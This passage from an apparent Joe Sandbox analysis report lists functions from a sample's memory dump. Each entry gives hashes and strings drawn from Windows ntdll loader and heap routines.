                                                • Instruction Fuzzy Hash: 3F412631A00A58CBEB26DFD8C844BADBBB8FF95344F180459D901FB791D7748A41CB90
                                                Function 01824755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                • LdrpCheckRedirection, xrefs: 0182488F
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                • Instruction ID: 41d53f930765fbe951db4198f86b73259493aed621d9725720733f8b19d922f6
                                                • Opcode Fuzzy Hash: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                • Instruction Fuzzy Hash: C441D072A102759FCB23CE6CD840A26BBE4BF49B50F060269ED58D7311D770DA80CBA1
                                                Function 017B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                • Instruction ID: 3c763fe673eaabd453c88562c3eda205688897da9d3ffc08dcdd715f5078d7bd
                                                • Opcode Fuzzy Hash: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                • Instruction Fuzzy Hash: C711DE7131450ACFDB6ACB18D8D4BABF3A4AF40B15F198159F006CB291DB30D940CB61
                                                Function 018220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpInitializationFailure, xrefs: 018220FA
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                • Instruction ID: aa50c96267b2bac563a35ee17b113a3db54e1352fa5120a166370d33eba1a873
                                                • Opcode Fuzzy Hash: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                • Instruction Fuzzy Hash: 60F0F675680718BBEB25EB4CCC56F9977ADFB40B54F240069FA00F7285D6B0AB40CA91
                                                Function 017B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                • Instruction ID: 8bdd5adc75cc3361716b9acef270047f066b38caef303b9d393b109b3891506f
                                                • Opcode Fuzzy Hash: af856dd45e3858842d580cb129d1ec4d79de784fbcb72a2c67a249d12ecbc852
                                                • Instruction Fuzzy Hash: B5712C71A0014A9FDB12DFA8C994FAEB7F8BF18704F144065EA05E7255EB38EE41CB61
                                                Function 017AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrResSearchResource Enter, xrefs: 017AAA13
                                                • LdrResSearchResource Exit, xrefs: 017AAA25
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                • Opcode ID: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                • Instruction ID: 8e0c5c59ec8719c7be617b8fc3eaa9466676a8af4b95157da276ee48e9baad7a
                                                • Opcode Fuzzy Hash: e561ea46d94a95167e68c2cabc55a0b1a96a2a87c9e5414e44ba4be6cad99673
                                                • Instruction Fuzzy Hash: 12E19471E00219DFEB22CF99CD94BAEFBBABF98350F500569E901E7291D7749A40CB50
                                                Function 0186A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: 938ade231ab903273e5c5ada9832a35f0349b64c84c53a83b7445840692d7f5c
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: DAC1F4312043469BE729CF28C845B6BBBE9BFC4318F084A2CF696DB291D775DA05CB51
                                                Function 0181E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 91bdfa61b8a0e810ec174431725312add0c46bad651738fa303b23d37fb63505
                                                • Instruction ID: cd5b13cd146aec8802ab59db9cd1e2b5a905611da4bc6a218c1f4915006d26fb
                                                • Opcode Fuzzy Hash: 91bdfa61b8a0e810ec174431725312add0c46bad651738fa303b23d37fb63505
                                                • Instruction Fuzzy Hash: 00616072E003099FEB15DFA8C844BAEBBF9FB48704F14446DEA59EB255D731AA40CB50
                                                Function 018443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                • Opcode ID: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                • Instruction ID: fc34e15d1f17c03acce5b161a2afc7cf080d5e6bf77ebceb4df8b4ca8af2d50e
                                                • Opcode Fuzzy Hash: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                • Instruction Fuzzy Hash: 3D512871E0021DAFDF11DFA9CC84BEEBBBDAB48754F100529E615F7291DA709A05CBA0
                                                Function 017A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                • kLsE, xrefs: 017A0540
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                • Instruction ID: e6cd202b16fc595f3a1bb8aed7baaa13bddfd9b978bb5464d4a3c53912e9dc2f
                                                • Opcode Fuzzy Hash: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                • Instruction Fuzzy Hash: CC519A715047428FD724EF68C444AA7FBE4AFC4308F644E3EEAEA87241E770A545CB92
                                                Function 017AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                • Instruction ID: 0202c504af76c636a9454b9fda2ce6feb1891ddf0dba23fbd0ba0baf248917d2
                                                • Opcode Fuzzy Hash: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                • Instruction Fuzzy Hash: 7C41E130A04659DBEB12CF6DC894B6EBBB5FF85300F1441A5E900DB291E7B5DA40CB41
                                                Function 017DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                • Instruction ID: 8449aaa76f2dc418e5a0ff2cb4cf5c349369a78130bda45f353e80901d28f71e
                                                • Opcode Fuzzy Hash: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                • Instruction Fuzzy Hash: DD01D1B2244708EFE311DF14CD49B26B7F8FB84715F058979A648C7190E374D904CB46
                                                Function 017AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                • Instruction ID: 94453ae562ebc6daa369c65ab1f43bdfcf6fc7832dea6bc3d6af40b7d38bd2e1
                                                • Opcode Fuzzy Hash: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                • Instruction Fuzzy Hash: 19827B75E002189FEB25CFA9C884BEDFBB5BF88310F548269E919AB751D7309981CF50
                                                Function 01826420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                • Instruction ID: 144ea78823a1c5e9a9e1a31fabaa4d8a1a1489511fe93c58af4001965c673129
                                                • Opcode Fuzzy Hash: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                • Instruction Fuzzy Hash: CE916771900229AFEB22DF95CD85FAEBBB8EF18B50F204059F600EB195E774AD40CB50
                                                Function 0184E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                • Instruction ID: c5a932a9f97a0a17d4ed3a073443a91b40165407f69d3d7cc67cba4e84f9e376
                                                • Opcode Fuzzy Hash: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                • Instruction Fuzzy Hash: 79918F3190061DABDB22ABA5DC88FAFBBB9FF45744F100029F501E7251EB389A01CB51
                                                Function 017DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                • Instruction ID: ae04b588e86351c7b0ac8a90374a4e18ff1a0bc04df4dcf791531cf0e3712640
                                                • Opcode Fuzzy Hash: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                • Instruction Fuzzy Hash: 08716FB6E0020ACFDF28CF9CD5906ADBBB5BF48710F24852EE945E7248E7719A41CB50
                                                Function 01844978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                • Opcode ID: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                • Instruction ID: 7925e3e0f553ff873d11362ca8a676235e334398f0ada4693333bf3eab9ca0e5
                                                • Opcode Fuzzy Hash: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                • Instruction Fuzzy Hash: 12519172D0022E9BDF10DF99D844BAEFBB4AF08B54F054129EA11FB255DB349A01CBE4
                                                Function 017BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                • Opcode ID: 14ef85546358eb54d8f67d53c7b3e6ec5c3b9e64b8a21e043d6c78847b6d9b8d
                                                • Instruction ID: b7d58deb7cc90963252eb6ac6c1b5ebeac5f0ec5234f305d9de43ae0b65d65ab
                                                • Opcode Fuzzy Hash: 14ef85546358eb54d8f67d53c7b3e6ec5c3b9e64b8a21e043d6c78847b6d9b8d
                                                • Instruction Fuzzy Hash: BA417072508342ABD711DA75D884BEBFBE8AF88B14F440A2DF684D7280EB74D944C796
                                                Function 0181C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                • Instruction ID: eae4daf10ff13b91d351460383e18c523a88414715315124ce99cff58efdc6f9
                                                • Opcode Fuzzy Hash: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                • Instruction Fuzzy Hash: F44142B2D4022DAADB21DB54CC84FDEB7BCAB44714F0045A5EB08EB145DB709F898FA5
                                                Function 01836B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                • Instruction ID: 5946c84e1bcd33f50f9f724baf521927bf96112e6e9fc953a125430dd273c517
                                                • Opcode Fuzzy Hash: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                • Instruction Fuzzy Hash: 1231FE31A00719ABDB22DB6DC854BEEBBF4DF55704F284068E941DB282E775DB06CB90
                                                Function 0181CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                • Instruction ID: 0cc54062ad31c98313f2364a27aba55ad2e9678629277c1811cd748a43e42e51
                                                • Opcode Fuzzy Hash: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                • Instruction Fuzzy Hash: E931D177A40519AFEB16DB59C845E6FBBB8FB80720F014129E905E7255D730AE04DBE0
                                                Function 0182892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                Strings
                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                • API String ID: 0-702105204
                                                • Opcode ID: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                • Instruction ID: 97b68c095d8a05cd39094598003da0ca45033e152ecb5eb98e440abcc7a504d6
                                                • Opcode Fuzzy Hash: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                • Instruction Fuzzy Hash: E001F7323002319BEF276F9AD8C4B6A7BA5EF82754F08011DF64186555CB207AC0C792
                                                Function 01842000 Relevance: .8, Instructions: 757COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                • Instruction ID: cd0c04fab7fc9366772328b9c24abe4154d83e1162bbd54109144cbc8d9144c3
                                                • Opcode Fuzzy Hash: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                • Instruction Fuzzy Hash: FC42C53560C3498BE725CF68D890A6FFBE6AF88704F04092DFA82D7250DB71DA45CB52
                                                Function 01838158 Relevance: .6, Instructions: 617COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
                                                • Instruction ID: 1c5031d33e243d2523a3bda428cec4d85bc798be092cc7b8514bd3158e8524a0
                                                • Opcode Fuzzy Hash: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
                                                • Instruction Fuzzy Hash: A3424275E102198FEB25CF69C881BADFBF5BF89300F188199E949EB241D7349A85CF50
                                                Function 017B2840 Relevance: .6, Instructions: 605COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e890a6fb990c1c45c0b72e45ca617cb0fd2d2efb2060fddb4caa54ce789e4847
                                                • Instruction ID: 09d670deff33227186743ce2ea9891a705627e284390fa1342991dd26eaa4988
                                                • Opcode Fuzzy Hash: e890a6fb990c1c45c0b72e45ca617cb0fd2d2efb2060fddb4caa54ce789e4847
                                                • Instruction Fuzzy Hash: 9F32DF70A007598FDB66CF69CC847BABBF2BF84304F24411DE556DB285E735AA21CB50
                                                Function 0184A118 Relevance: .6, Instructions: 591COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                • Instruction ID: 0daf9a6aebe6519eed4b9684641d584cd4ac8d73426f51147c1a9e4e02c0daa9
                                                • Opcode Fuzzy Hash: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                • Instruction Fuzzy Hash: 7222C2742446698BEB2DCF2DC094376BBF1AF44304F08845AE997CF286EB35D652DB60
                                                Function 017A6A50 Relevance: .5, Instructions: 548COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                • Instruction ID: 8b6faa3d61cb7bffe2f6e5ec16c2f13c35559ed388bc409c25cd5c6fd987c9db
                                                • Opcode Fuzzy Hash: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                • Instruction Fuzzy Hash: DC32AE71A01209CFDB25CF68C884AAAF7F1FF88310F684669E955EB391D734E941CB90
                                                Function 017C4A35 Relevance: .4, Instructions: 423COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction ID: 97e43d292e6b0621cb476774175645ac0d2f51d18b30d3f75c71de6a4729ec2c
                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction Fuzzy Hash: 43F17074E0020A9BDB25DF99C994BAEFBF5AF48B10F04812DE902EB354E734E941CB50
                                                Function 0183892B Relevance: .4, Instructions: 386COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                • Instruction ID: 74cefc0a1422cf707b425ee100eae59c8c003b51e157a5df0008ddafd1b190b4
                                                • Opcode Fuzzy Hash: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                • Instruction Fuzzy Hash: 2DD1D471A0060A9BDF15CF69C841AFEB7F1AFC9304F1C8269E955E7241D735EA068B90
                                                Function 017A65D0 Relevance: .4, Instructions: 383COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                • Instruction ID: 6a6d744c21ac7b3df6a6dc737763c1590856ba30b3d24ee5f0211c8b63ce3225
                                                • Opcode Fuzzy Hash: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                • Instruction Fuzzy Hash: 6DE17871608342CFC715CF28C494A6AFBE0BF89314F598A6DF99987351EB31E905CB92
                                                Function 01798397 Relevance: .4, Instructions: 380COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                • Instruction ID: 5f7b8f96c74019fefedfac4daa078a9291025d66b48c0851f4ae4f75437d74e4
